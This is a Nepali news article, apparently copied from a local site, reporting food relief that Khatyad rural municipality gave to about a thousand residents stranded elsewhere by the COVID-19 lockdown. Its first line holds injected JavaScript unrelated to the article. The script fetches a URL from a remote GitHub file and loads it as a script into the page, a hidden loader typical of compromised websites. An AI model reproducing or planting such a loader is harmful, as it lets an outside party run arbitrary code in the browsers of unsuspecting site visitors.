;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज,
काठमाडौँ | खत्याड गाउँपालिकाले जिल्ला बाहिर अलपत्र परेका आफ्ना नागरिकलाई बसेकै स्थानमा गएर राहत वितरण गरेको छ । युवा नेता तथा समाजसेवी भक्त बहादुर रावत सहितको व्याबस्थापकिय टीमले सो कार्य गरेका हुन् |
आफ्नो जिल्लाबाट कामको शिलसिलामा काठमाडौं उपत्यका , नेपालगंज र सुर्खेतमा रहेका जिल्ला बासीलाई चामल, नुन, तेल, दाल, चिनी, चिउरा लगायतका खाद्यान्न सम्बन्धित जिल्लाका स्थानीय निकायसँग समन्वय गरी वितरण गरिएको कुरा भक्त बहादुर रावतले जानकारी दिए।
कोरोना भाइरस रोकथाम तथा नियन्त्रणका लागि चैत्र ११ गते देखि लागू भएको लकडाउनका कारण अलपत्र परेका आफ्ना नागरिकलाई बसेकै स्थानमा राहत वितरण गरेका हुन् ।
टोलीले काठमाडौं उपत्यकामा , नेपालगंजमा र सुर्खेतमा गरि लगभग १ हजार जनालाई राहात वितरण गरिएको हो | लकडाउनका कारण अलपत्र परेका कतिपय स्थानीयलाई घर फर्काइएका छन् |
“हामिजस्तै अन्य खत्याडबासी कसरी घर फर्कर्ने चिन्तामा थियौं “, राहत पाएपछि खुसी भएका भक्तपुरमा रहेका खत्याड गाउँपालिका ३ राजन सिंहको भनाई छ |
सम्बाददाता: रन्जन कुमार सापकोटा
फेसबुक प्रतिक्रियाहरु